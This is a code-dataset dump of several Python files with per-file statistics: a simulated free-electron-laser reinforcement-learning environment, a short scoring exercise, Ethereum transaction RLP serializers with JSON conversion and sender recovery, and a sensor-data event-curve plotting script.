| 37.849057 | 80 | 0.641077 | 231 | 2,006 | 5.467532 | 0.536797 | 0.105305 | 0.138559 | 0.10293 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013741 | 0.201894 | 2,006 | 52 | 81 | 38.576923 | 0.775141 | 0.089731 | 0 | 0 | 0 | 0.027778 | 0.460309 | 0.048512 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027778 | 0 | 0.027778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
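The entry_points mapping above makes pip expose a spiders console command backed by spiders.cli:main; a hypothetical minimal cli module satisfying that contract (the real spiders.cli is not shown):

import click

@click.command()
def main():
    """Console script for spiders."""
    click.echo("spiders")

if __name__ == "__main__":
    main()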
df45960db91c2753ebf54796d5923cb3020270a4 | 13,091 | py | Python | local_fel_simulated_env.py | MathPhysSim/FERMI_RL_Paper | 4529fcbfa0cc35e5fa59463df2c423a497736eba | [
"MIT"
] | 7 | 2021-02-05T18:02:43.000Z | 2022-02-22T13:54:30.000Z | local_fel_simulated_env.py | MathPhysSim/FERMI_RL_Paper | 4529fcbfa0cc35e5fa59463df2c423a497736eba | [
"MIT"
] | 3 | 2021-01-16T17:08:17.000Z | 2021-01-19T13:38:42.000Z | local_fel_simulated_env.py | MathPhysSim/FERMI_RL_Paper | 4529fcbfa0cc35e5fa59463df2c423a497736eba | [
"MIT"
] | 2 | 2021-01-15T11:08:36.000Z | 2021-11-22T06:26:42.000Z | import pickle
import numpy as np
import gym
import pybobyqa  # used by the optimisation block under __main__
import tensorflow as tf
import matplotlib.pyplot as plt
import pandas as pd
from simulated_tango import SimTangoConnection
class FelLocalEnv(gym.Env):
def __init__(self, tango, **kwargs):
self.max_steps = 10
print('init env ' * 20)
self.init_rewards = []
self.done = False
self.current_length = 0
self.__name__ = 'FelLocalEnv'
self.curr_episode = -1
self.TOTAL_COUNTER = -1
self.rewards = []
self.states = []
self.actions = []
self.dones = []
self.initial_conditions = []
# tango = SimTangoConnection() simulates the behaviour of the system we want to control
self.tango = tango
# some information from tango
self.state_size = self.tango.state_size
self.action_size = self.tango.action_size
self.target_state = self.tango.target_state
self.target_intensity = self.tango.target_intensity
# current state
self.init_state = self.tango.state
# scaling factor definition
if 'half_range' in kwargs:
self.half_range = kwargs.get('half_range')
else:
self.half_range = 3000
self.state_range = self.get_range()
self.state_scale = 2 * self.half_range
# state, intensity and reward first definition
self.state = self.scale(self.init_state)
self.intensity = self.get_intensity()
self.reward = self.get_reward()
# max action allowed
if 'max_action' in kwargs:
max_action = kwargs.get('max_action')
else:
max_action = 500
# max_action = 6000
self.max_action = max_action / self.state_scale
print('max_action', max_action)
# state space definition
self.observation_space = gym.spaces.Box(low=0.0,
high=1.0,
shape=(self.state_size,),
dtype=np.float64)
# action space definition
self.action_space = gym.spaces.Box(low=-self.max_action,
high=self.max_action,
shape=(self.state_size,),
dtype=np.float64)
self.test = False
print('real env scale:', self.action_space.low, self.action_space.high, self.observation_space.low,
self.observation_space.high)
def get_range(self):
# defines the available state space
state_range = np.c_[self.init_state - self.half_range, self.init_state + self.half_range]
return state_range
def scale(self, state):
# scales the state from state_range values to [0, 1]
state_scaled = (state - self.state_range[:, 0]) / self.state_scale
return state_scaled
def descale(self, state):
# descales the state from [0, 1] to state_range values
state_descaled = state * self.state_scale + self.state_range[:, 0]
return state_descaled
def set_state(self, state):
# writes descaled state
state_descaled = self.descale(state)
self.tango.set_state(state_descaled)
def get_state(self):
# read scaled state
state = self.tango.get_state()
state_scaled = self.scale(state)
return state_scaled
def set_state_ext(self, state):
state_descaled = self.descale(state)
self.tango.set_state(state_descaled)
state = self.tango.get_state()
self.state = self.scale(state)
def norm_intensity(self, intensity):
# normalize the intensity with respect to target_intensity
intensity_norm = intensity / self.target_intensity
return intensity_norm
def get_intensity(self):
# read normalized intensity
intensity = self.tango.get_intensity()
intensity_norm = self.norm_intensity(intensity)
return intensity_norm
def step(self, action):
action = np.squeeze(action)
# print('a', action)
# step method
self.current_length += 1
# rescale action
# action /= 6
# action = np.clip(action, -1, 1)
state, reward = self.take_action(action.copy())
# state = state + 1e-4*np.random.randn(self.observation_space.shape[-1])
# reward += 1e-4 * np.random.randn(1)[0]
intensity = self.get_intensity()
# print('intensity', intensity)
# if any(self.states[self.curr_episode][-1] == state):
# self.boundary += 1
# print('boundary hit nr: ', self.boundary)
# else:
# self.boundary = -1
if intensity > .95:
self.done = True
# print('passed at', intensity)
# elif self.boundary > 10:
# self.done = True
elif self.current_length >= self.max_steps:
# print('failed at', intensity)
self.done = True
# elif any(self.state + action)<0 or any(self.state + action)>1:
# self.done = True
# print('step:')
# print()
# # print('s ', state)
########################################################################################################
# print(self.curr_episode, self.current_length, 'state ', state, 'a ', action, 'r ', reward)
########################################################################################################
if self.test:
self.add_trajectory_data(state=state, action=action, reward=reward, done=self.done)
# if self.done:
# print('done at ', reward)
return state, reward, self.done, {}
def take_action(self, action):
# print('action inner: ', np.round(action*12,2))
# action /= 12
# take action method
new_state = self.state + action # + 0.05*np.random.randn(action.shape[-1])
# state must remain in [0, 1]
if any(new_state < 0.0) or any(new_state > 1.0):
new_state = np.clip(new_state, 0.0, 1.0)
# self.done = True
# print('WARNING: state boundaries!')
# set new state to the machine
self.set_state(new_state)
state = self.get_state()
self.state = state
# get new intensity from the machine
intensity = self.get_intensity()
self.intensity = intensity
# reward calculation
reward = self.get_reward()
self.reward = reward
return state, reward
def get_reward(self):
# You can change reward function, but it should depend on intensity
# e.g. next line
reward = -(1 - self.intensity / self.target_intensity)
# reward = self.intensity
return reward
def reset(self, **kwargs):
# print('reset true env')
self.boundary = -1
# reset method
self.done = False
self.current_length = 0
# self.curr_step = 0
bad_init = True
while bad_init:
if 'set_state' in kwargs:
new_state = kwargs.get('set_state')
print('set_state')
else:
# new_state = self.observation_space.sample()
new_state = np.array([.1,.3,.7,.2])
self.set_state(new_state)
state = self.get_state()
self.state = state
intensity = self.get_intensity()
self.intensity = intensity
# bad_init = False if -(1 - self.intensity / self.target_intensity) > -1 else True
reward = -(1 - self.intensity / self.target_intensity)
self.init_rewards.append(reward)
bad_init = False
done = self.intensity > .95
action = np.zeros(self.action_space.shape)
self.curr_episode += 1
if self.test:
# self.curr_episode += 1
self.rewards.append([])
self.actions.append([])
self.states.append([])
self.dones.append([])
self.add_trajectory_data(state=state, action=action, reward=reward, done=done)
# print('reset',self.dones)
# print('\n init:', -(1 - self.intensity / self.target_intensity))
# return 2 * (state - 0.5)
return state
def add_trajectory_data(self, state, action, reward, done):
self.rewards[self.curr_episode].append(reward)
self.actions[self.curr_episode].append(action)
self.states[self.curr_episode].append(state)
self.dones[self.curr_episode].append(done)
def seed(self, seed=None):
# seed method
np.random.seed(seed)
def render(self, mode='human'):
# render method
print('ERROR\nnot yet implemented!')
pass
def store_trajectories_to_pkl(self, name, directory):
out_put_writer = open(directory + name, 'wb')
pickle.dump(self.states, out_put_writer, -1)
pickle.dump(self.actions, out_put_writer, -1)
pickle.dump(self.rewards, out_put_writer, -1)
pickle.dump(self.dones, out_put_writer, -1)
out_put_writer.close()
if __name__ == '__main__':
import scipy.optimize as opt
tng = SimTangoConnection()
env = FelLocalEnv(tng)
low = env.action_space.low
high = env.action_space.high
def normalize(input, box):
low = tf.convert_to_tensor(box.low, dtype=tf.float64)
high = tf.convert_to_tensor(box.high, dtype=tf.float64)
return tf.math.scalar_mul(tf.convert_to_tensor(2, dtype=tf.float64),
tf.math.add(tf.convert_to_tensor(-0.5, dtype=tf.float64),
tf.multiply(tf.math.add(input, -low), 1 / (high - low))))
def de_normalize(input, box):
low = tf.convert_to_tensor(box.low, dtype=tf.float64)
high = tf.convert_to_tensor(box.high, dtype=tf.float64)
return tf.math.add(
tf.multiply(tf.math.add(tf.math.scalar_mul(tf.convert_to_tensor(1 / 2, dtype=tf.float64), input),
tf.convert_to_tensor(0.5, dtype=tf.float64)),
(high - low)), low)
# print((env.action_space.sample() - low)/(high-low))
# print('')
# for _ in range(1):
# s = env.reset()
# a = env.action_space.sample()
# box = env.action_space
# # ns, r = env.step(a)
# print(a)
# print(normalize(a, box=box))
# print(de_normalize(normalize(a, box=box), box=box))
# # print(env.action_space.low)
# # print('state:', env.descale(s))
# # # print(a)
# # print('new state:', env.descale(ns))
# # print('reward:', r)
# # print('')
class WrappedEnv(gym.Wrapper):
def __init__(self, env, **kwargs):
gym.Wrapper.__init__(self, env)
self.current_action = np.zeros(env.action_space.shape[0])
def reset(self, **kwargs):
self.current_obs = self.env.reset(**kwargs)
return self.current_obs
def step(self, action):
self.env.state = self.current_obs
ob, reward, done, info = self.env.step(action)
return ob, reward, done, info
environment_instance = WrappedEnv(env=env)
rews = []
actions = []
states = []
def objective(action):
actions.append(action.copy())
_, r, _, _ = environment_instance.step(action=action.copy())
rews.append(abs(r))
return abs(r)
if True:
def constr(action):
if any(action > environment_instance.action_space.high[0]):
return -1
elif any(action < environment_instance.action_space.low[0]):
return -1
else:
return 1
init = environment_instance.reset()
print('init: ', init)
start_vector = np.zeros(environment_instance.action_space.shape[0])
# rhobeg = 1 * environment_instance.action_space.high[0]
# print('rhobeg: ', rhobeg)
# res = opt.fmin_cobyla(objective, start_vector, [constr], rhobeg=rhobeg, rhoend=.001)
# constr = {'type': 'ineq', 'fun': lambda x: any(abs(x) > 1/12)}
# minimizer_kwargs = {"method": "COBYLA", "constraints": constr}
# res = opt.basinhopping(objective, start_vector, minimizer_kwargs=minimizer_kwargs)
# print(res)
upper = environment_instance.action_space.high*12
lower = environment_instance.action_space.low*12
soln = pybobyqa.solve(objective, start_vector, maxfun=500, bounds=(lower, upper),
rhobeg=1, seek_global_minimum=True)
print(soln)
fig, axs = plt.subplots(2, sharex=True)
axs[1].plot(rews)
pd.DataFrame(actions).plot(ax=axs[0])
plt.show()
environment_instance.state = init
print(environment_instance.step(soln.x)) | 34.632275 | 112 | 0.567489 | 1,545 | 13,091 | 4.649191 | 0.165049 | 0.03383 | 0.018794 | 0.018934 | 0.243213 | 0.18335 | 0.150494 | 0.106362 | 0.088542 | 0.079354 | 0 | 0.016072 | 0.306088 | 13,091 | 378 | 113 | 34.632275 | 0.774659 | 0.22038 | 0 | 0.226852 | 0 | 0 | 0.016162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.00463 | 0.037037 | 0 | 0.240741 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
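A random-rollout sketch for FelLocalEnv above, independent of the pybobyqa optimisation in the __main__ block; it assumes simulated_tango is importable:

from simulated_tango import SimTangoConnection

tng = SimTangoConnection()
env = FelLocalEnv(tng)
obs = env.reset()
done = False
while not done:                              # ends after 10 steps or success
    action = env.action_space.sample()
    obs, reward, done, _ = env.step(action)
    print(round(float(reward), 3))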
df45e549a1af4f02c178b91f5b88e8159e693bb4 | 220 | py | Python | 06_Array1D/Step06/6_6_sang.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | 06_Array1D/Step06/6_6_sang.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | 3 | 2020-11-04T05:38:53.000Z | 2021-03-02T02:15:19.000Z | 06_Array1D/Step06/6_6_sang.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | t = int(input())
for i in range(t):
count = 0
score = 0
s = input()
for j in s:
if j == 'O':
count += 1
score += count
else:
count = 0
print(score)
| 16.923077 | 26 | 0.390909 | 30 | 220 | 2.866667 | 0.566667 | 0.186047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035398 | 0.486364 | 220 | 12 | 27 | 18.333333 | 0.725664 | 0 | 0 | 0.166667 | 0 | 0 | 0.004545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
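A worked example of the scoring rule above: consecutive 'O's score 1, 2, 3, ... and an 'X' resets the streak. Extracted into a reusable function for clarity:

def ox_score(s: str) -> int:
    score = streak = 0
    for ch in s:
        streak = streak + 1 if ch == 'O' else 0
        score += streak
    return score

assert ox_score("OOXXOXXOOO") == 1 + 2 + 0 + 0 + 1 + 0 + 0 + 1 + 2 + 3  # 10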
df4783c82e2a310e7871ee16fb7207f64651b42a | 13,710 | py | Python | src/bxcommon/messages/eth/serializers/transaction.py | sasha00123/bxcommon | 4d65c48daacb63bfdf5d121aa4dbf3501cf0516b | [
"MIT"
] | 12 | 2019-11-06T17:39:10.000Z | 2022-03-01T11:26:19.000Z | src/bxcommon/messages/eth/serializers/transaction.py | sasha00123/bxcommon | 4d65c48daacb63bfdf5d121aa4dbf3501cf0516b | [
"MIT"
] | 8 | 2019-11-06T21:31:11.000Z | 2021-06-02T00:46:50.000Z | src/bxcommon/messages/eth/serializers/transaction.py | sasha00123/bxcommon | 4d65c48daacb63bfdf5d121aa4dbf3501cf0516b | [
"MIT"
] | 5 | 2019-11-14T18:08:11.000Z | 2022-02-08T09:36:22.000Z | from typing import Optional, Dict, Any, List
import blxr_rlp as rlp
from bxcommon.messages.eth.serializers.transaction_type import EthTransactionType
from bxcommon.messages.eth.serializers.unsigned_transaction import UnsignedTransaction
from bxcommon.utils import convert
from bxcommon.utils.blockchain_utils.eth import eth_common_utils, eth_common_constants, crypto_utils
from bxcommon.utils.object_hash import Sha256Hash
from bxutils import utils
class AccessedAddress(rlp.Serializable):
fields = [
(
"address",
rlp.sedes.Binary.fixed_length(eth_common_constants.ADDRESS_LEN, allow_empty=True),
),
("storage_keys", rlp.sedes.CountableList(rlp.sedes.binary)),
]
address: bytearray
storage_keys: List[bytearray]
def __init__(self, *args, **kwargs):
self.address = bytearray()
self.storage_keys = []
super().__init__(*args, **kwargs)
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "AccessedAddress":
return AccessedAddress(
utils.or_else(
utils.optional_map(payload["address"], lambda addr: convert.hex_to_bytes(addr[2:])),
bytes(),
),
[
utils.optional_map(key, lambda k: convert.hex_to_bytes(k[2:]))
for key in payload["storageKeys"]
],
)
class Transaction(rlp.Serializable):
"""
Some notes on the Berlin implementation details:
(see https://eips.ethereum.org/EIPS/eip-2718 for spec)
Transaction can either be an RLP encoded list of all transaction attributes
(e.g. `[nonce, gas_price, start_gas, ..., v, r, s]`), or an opaque byte string
consisting of `"[transaction_type][nonce, gas_price, start_gas, ...]"`.
As a result, `Transaction.serialize/deserialize` can return either the
RLP list or the opaque byte string, and this can be confusing to work with.
As a rule of thumb, LegacyTransactions will need to call `rlp.encode` to
get the transaction byte representation for purposes such as calculating its
hash, while new transaction should not, as that will result in double encoding.
    It's possible for LegacyTransaction to be in either representation. In our
    implementation, we currently choose to always serialize LegacyTransaction in
    the original, first representation, since that makes it easier for test cases
    to ensure we have a mix of old and new transactions in blocks. However, this
    code is capable of understanding LegacyTransaction in either format.
"""
transaction_type: EthTransactionType = EthTransactionType.LEGACY
nonce: int = 0
gas_price: int = 0
start_gas: int = 0
to: Optional[bytearray] = None
value: int = 0
data: bytearray
v: int = 0 # pylint: disable=invalid-name
r: int = 0 # pylint: disable=invalid-name
s: int = 0 # pylint: disable=invalid-name
def __init__(self, *args, **kwargs):
self.data = bytearray()
super().__init__(*args, **kwargs)
# pylint: disable=arguments-differ
@classmethod
def serialize(cls, obj, type_parsed: bool = False, **kwargs):
if type_parsed:
result = super().serialize(obj)
if obj.transaction_type == EthTransactionType.LEGACY:
return result
return obj.transaction_type.encode_rlp() + rlp.encode(result)
else:
return obj.__class__.serialize(obj, type_parsed=True, **kwargs)
# pylint: disable=arguments-differ
@classmethod
def deserialize(cls, serial, type_parsed: bool = False, **extra_kwargs):
if type_parsed:
return super().deserialize(serial, **extra_kwargs)
if isinstance(serial, (list, tuple)):
return LegacyTransaction.deserialize(serial, type_parsed=True, **extra_kwargs)
if isinstance(serial, memoryview):
serial = serial.tobytes()
if isinstance(serial, bytes):
transaction_flag = serial[0]
if transaction_flag <= eth_common_constants.MAX_TRANSACTION_TYPE:
transaction_type = EthTransactionType(serial[0])
payload = rlp.decode(serial[1:])
else:
payload = rlp.decode(serial)
transaction_type = EthTransactionType.LEGACY
if transaction_type == EthTransactionType.LEGACY:
return LegacyTransaction.deserialize(payload, type_parsed=True, **extra_kwargs)
elif transaction_type == EthTransactionType.ACCESS_LIST:
return AccessListTransaction.deserialize(payload, type_parsed=True, **extra_kwargs)
raise ValueError(f"Unexpected serial type: {type(serial)}")
def hash(self) -> Sha256Hash:
pass
def contents(self) -> memoryview:
return memoryview(rlp.encode(self))
def is_eip_155_signed(self) -> bool:
return self.v >= eth_common_constants.EIP155_CHAIN_ID_OFFSET
def chain_id(self) -> int:
if self.v % 2 == 0:
v = self.v - 1 # pylint: disable=invalid-name
else:
v = self.v # pylint: disable=invalid-name
return (v - eth_common_constants.EIP155_CHAIN_ID_OFFSET) // 2
def signature(self) -> bytes:
return crypto_utils.encode_signature(self.v, self.r, self.s)
def get_unsigned(self) -> bytes:
pass
def to_json(self) -> Dict[str, Any]:
"""
Serializes data to be close to Ethereum RPC spec for publishing to the transaction
feed.
see https://github.com/ethereum/wiki/wiki/JSON-RPC#eth_gettransactionbyhash
Some fields are excluded, since they will never be populated by bxgateway.
(mainly fields related to the block the transaction gets included in)
- blockHash
- blockNumber
- transactionIndex
"""
message_hash = self.hash()
input_data = convert.bytes_to_hex(self.data)
if not input_data:
input_data = "0x"
else:
input_data = f"0x{input_data}"
serialized_output = {
"from": self.from_address(),
"gas": hex(self.start_gas),
"gas_price": hex(self.gas_price),
"hash": f"0x{str(message_hash)}",
"input": input_data,
"nonce": hex(self.nonce),
"value": hex(self.value),
"v": hex(self.v),
"r": hex(self.r),
"s": hex(self.s),
"type": f"0x{self.transaction_type.value}",
}
to = self.to
if to is not None:
serialized_output["to"] = convert.bytes_to_hex_string_format(to)
return serialized_output
def from_address(self) -> str:
from_key = crypto_utils.recover_public_key(
self.get_unsigned(), self.signature(), eth_common_utils.keccak_hash
)
from_address = crypto_utils.public_key_to_address(from_key)
return convert.bytes_to_hex_string_format(from_address)
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "Transaction":
transaction_cls = LegacyTransaction
try:
transaction_type = EthTransactionType(int(payload.get("type", "0x0"), 16))
if transaction_type == EthTransactionType.ACCESS_LIST:
transaction_cls = AccessListTransaction
except ValueError:
# assume legacy transaction if transaction_type access fails
pass
return transaction_cls.from_json(payload)
@classmethod
def from_json_with_validation(cls, payload: Dict[str, Any]) -> "Transaction":
"""
        Create a Transaction from a payload dict.
        This method supports a less strict payload and accepts input in both the Eth format and our own.
"""
if "gas_price" in payload:
payload["gasPrice"] = payload["gas_price"]
if "access_list" in payload:
payload["accessList"] = payload["access_list"]
if "chain_id" in payload:
payload["chainId"] = payload["chain_id"]
for item in ["nonce", "gasPrice", "gas", "value", "v", "r", "s"]:
value = payload[item]
if isinstance(value, int):
payload[item] = hex(value)
for item in ["accessList", "chainId"]:
if item in payload:
value = payload[item]
if isinstance(value, int):
payload[item] = hex(value)
return cls.from_json(payload)
class LegacyTransaction(Transaction):
transaction_type: EthTransactionType = EthTransactionType.LEGACY
fields = [
("nonce", rlp.sedes.big_endian_int),
("gas_price", rlp.sedes.big_endian_int),
("start_gas", rlp.sedes.big_endian_int),
("to", rlp.sedes.Binary.fixed_length(eth_common_constants.ADDRESS_LEN, allow_empty=True)),
("value", rlp.sedes.big_endian_int),
("data", rlp.sedes.binary),
("v", rlp.sedes.big_endian_int),
("r", rlp.sedes.big_endian_int),
("s", rlp.sedes.big_endian_int),
]
def hash(self):
hash_bytes = eth_common_utils.keccak_hash(rlp.encode(self))
return Sha256Hash(hash_bytes)
def get_unsigned(self) -> bytes:
"""
Returns unsigned transaction.
EIP-155 protected transactions require the chain ID encoded in the v
field, and the r/s fields to be empty.
:return:
"""
if self.is_eip_155_signed():
parts = rlp.decode(rlp.encode(Transaction.serialize(self)))
parts_for_signing = parts[:-3] + [
eth_common_utils.int_to_big_endian(self.chain_id()),
b"",
b"",
]
return rlp.encode(parts_for_signing)
else:
return rlp.encode(
UnsignedTransaction(
self.nonce, self.gas_price, self.start_gas, self.to, self.value, self.data
)
)
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "Transaction":
return LegacyTransaction(
int(payload["nonce"], 16),
int(payload["gasPrice"], 16),
int(payload["gas"], 16),
utils.or_else(
utils.optional_map(payload["to"], lambda to: convert.hex_to_bytes(to[2:])), bytes()
),
int(payload["value"], 16),
convert.hex_to_bytes(payload["input"][2:]),
int(payload["v"], 16),
int(payload["r"], 16),
int(payload["s"], 16),
)
class AccessListTransaction(Transaction):
transaction_type: EthTransactionType = EthTransactionType.ACCESS_LIST
fields = [
("_chain_id", rlp.sedes.big_endian_int),
("nonce", rlp.sedes.big_endian_int),
("gas_price", rlp.sedes.big_endian_int),
("start_gas", rlp.sedes.big_endian_int),
("to", rlp.sedes.Binary.fixed_length(eth_common_constants.ADDRESS_LEN, allow_empty=True)),
("value", rlp.sedes.big_endian_int),
("data", rlp.sedes.binary),
("access_list", rlp.sedes.CountableList(AccessedAddress)),
("v", rlp.sedes.big_endian_int),
("r", rlp.sedes.big_endian_int),
("s", rlp.sedes.big_endian_int),
]
_chain_id: int = 0
access_list: List[AccessedAddress]
def __init__(self, *args, **kwargs):
self.access_list = []
super().__init__(*args, **kwargs)
def hash(self):
hash_bytes = eth_common_utils.keccak_hash(Transaction.serialize(self))
return Sha256Hash(hash_bytes)
def chain_id(self) -> int:
return self._chain_id
def get_unsigned(self) -> bytes:
"""
Returns unsigned transaction. EIP-2930 transaction are always EIP-155
protected. They do not require any of the v/r/s values included.
:return:
"""
parts = rlp.decode(Transaction.serialize(self)[1:])
return EthTransactionType.ACCESS_LIST.encode_rlp() + rlp.encode(parts[:-3])
def signature(self) -> bytes:
return crypto_utils.encode_signature_y_parity(self.v, self.r, self.s)
def to_json(self) -> Dict[str, Any]:
serialized_transaction = super().to_json()
serialized_transaction["chain_id"] = f"0x{self.chain_id()}"
access_list = self.access_list
accessed_addresses = []
for accessed_address in access_list:
accessed_addresses.append(
{
"address": convert.bytes_to_hex_string_format(accessed_address.address),
"storage_keys": [
convert.bytes_to_hex_string_format(key)
for key in accessed_address.storage_keys
],
}
)
serialized_transaction["access_list"] = accessed_addresses
return serialized_transaction
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "Transaction":
return AccessListTransaction(
int(payload["chainId"], 16),
int(payload["nonce"], 16),
int(payload["gasPrice"], 16),
int(payload["gas"], 16),
utils.or_else(
utils.optional_map(payload["to"], lambda to: convert.hex_to_bytes(to[2:])), bytes()
),
int(payload["value"], 16),
convert.hex_to_bytes(payload["input"][2:]),
[
AccessedAddress.from_json(accessed_address)
for accessed_address in payload["accessList"]
],
int(payload["v"], 16),
int(payload["r"], 16),
int(payload["s"], 16),
)
| 36.462766 | 104 | 0.613713 | 1,587 | 13,710 | 5.110271 | 0.173283 | 0.022688 | 0.020345 | 0.031443 | 0.368927 | 0.290012 | 0.24476 | 0.208385 | 0.199014 | 0.167941 | 0 | 0.010204 | 0.278045 | 13,710 | 375 | 105 | 36.56 | 0.809153 | 0.156018 | 0 | 0.369811 | 0 | 0 | 0.053559 | 0.004603 | 0 | 0 | 0.000266 | 0 | 0 | 1 | 0.09434 | false | 0.011321 | 0.030189 | 0.030189 | 0.309434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
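A from_json sketch for the serializers above; the field values are illustrative and v/r/s do not form a valid signature, so from_address() would not be meaningful on this object.

payload = {
    "nonce": "0x0", "gasPrice": "0x3b9aca00", "gas": "0x5208",
    "to": "0x" + "11" * 20, "value": "0x1", "input": "0x",
    "v": "0x1b", "r": "0x1", "s": "0x1", "type": "0x0",
}
tx = Transaction.from_json(payload)
print(type(tx).__name__)   # LegacyTransaction
print(tx.hash())           # keccak hash of the RLP encoding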
df4845df44a2ce964a86def84f39985731180a50 | 3,425 | py | Python | simulator/lab11_data/gen_event_curve.py | lab11/Task2 | 3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6 | [
"Apache-2.0"
] | 21 | 2018-08-29T18:58:26.000Z | 2022-01-12T09:08:04.000Z | simulator/lab11_data/gen_event_curve.py | lab11/permamote | 3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6 | [
"Apache-2.0"
] | 9 | 2017-11-08T03:22:58.000Z | 2020-05-02T18:23:12.000Z | simulator/lab11_data/gen_event_curve.py | lab11/Task2 | 3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6 | [
"Apache-2.0"
] | 8 | 2018-10-28T23:44:23.000Z | 2021-07-11T05:18:02.000Z | #! /usr/bin/env python3
import os
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from multiprocessing import Pool
from datetime import datetime
import arrow
data_dir = 'clean_data/'
out_dir = 'curves/'
out_dir = os.path.dirname(out_dir) + '/'
if out_dir:
os.makedirs(out_dir, exist_ok=True)
def decode_to_bool(bytes_to_decode):
if bytes_to_decode == b'True': return True
else: return False
def plot_data(title, times, data):
#monthsloc = mdates.MonthLocator()
#daysloc= mdates.DayLocator()
#monthsfmt = mdates.DateFormatter('%B')
#daysfmt = mdates.DateFormatter('%d')
fig, ax = plt.subplots()
ax.set_title(title)
#ax.xaxis.set_major_locator(monthsloc)
#ax.xaxis.set_major_formatter(monthsfmt)
#ax.xaxis.set_minor_locator(daysloc)
#ax.xaxis.set_minor_formatter(daysfmt)
ax.plot(times, data)
def plot_full_data(fname, utc_diff):
print(fname)
#data = np.loadtxt(data_dir + fname, dtype = 'bool', delimiter=',', usecols=1, converters = {1:decode_to_bool})
#times = np.loadtxt(data_dir + fname, dtype = 'datetime64', delimiter=',', usecols=0, converters = {0:np.datetime64})
array_load = np.load(data_dir + fname)
times = array_load[:,0].astype('datetime64[s]').astype('datetime64[m]')
times = times + np.timedelta64(utc_diff, 'h')
data = array_load[:,1]
# convert to hour granularity
times = times.astype('datetime64[h]').astype(datetime)
unique_times = np.unique(times)
bins = []
for hour in unique_times:
bins.append(np.sum(data[times == hour]))
bins = np.asarray(bins)
plot_data(fname, unique_times, bins)
plt.show()
def generate_average_event_curve(fname, utc_diff, date_range):
print(fname)
#data = np.loadtxt(data_dir + fname, dtype = 'bool', delimiter=',', usecols=1, converters = {1:decode_to_bool})
#times = np.loadtxt(data_dir + fname, dtype = 'datetime64', delimiter=',', usecols=0, converters = {0:np.datetime64})
#times = times + np.timedelta64(utc_diff, 'h')
array_load = np.load(data_dir + fname)
times = array_load[:,0].astype('datetime64[s]').astype('datetime64[m]')
times = times + np.timedelta64(utc_diff, 'h')
data = array_load[:,1]
# convert to hour granularity
times = times.astype('datetime64[h]').astype(datetime)
# limit to range we're interested in
selection = np.logical_and(times >= date_range[0], times < date_range[1])
times = times[selection]
data = data[selection]
# get days of activity
times_days = times.astype('datetime64[D]').astype('datetime64[h]').astype(datetime)
days = np.unique(times_days)
avg_curve = []
for day in days:
times_in_day = times[times_days == day]
unique_times = np.unique(times_in_day)
bins = []
for hour in unique_times:
bins.append(np.sum(data[times == hour]))
bins = np.asarray(bins)
avg_curve.append(bins)
avg_curve = np.asarray(avg_curve)
avg_curve = np.average(avg_curve, axis = 0)
return avg_curve
fname = 'motion-Blink-c098e5900064-3rd_Floor_2016-07-27_clean.npy'
curve = generate_average_event_curve(fname, -4, (datetime(2016, 7, 30), datetime(2016, 8, 6)))
plot_data(fname, np.arange(curve.size), curve/np.max(curve))
np.save(out_dir+fname.split('-')[2] + '_reactive_curve', curve/np.max(curve))
plt.show()
| 36.43617 | 121 | 0.68146 | 486 | 3,425 | 4.62963 | 0.27572 | 0.056889 | 0.032 | 0.028444 | 0.448889 | 0.387111 | 0.387111 | 0.373333 | 0.373333 | 0.373333 | 0 | 0.028329 | 0.175474 | 3,425 | 93 | 122 | 36.827957 | 0.768414 | 0.268029 | 0 | 0.349206 | 0 | 0 | 0.080755 | 0.022499 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063492 | false | 0 | 0.126984 | 0 | 0.206349 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
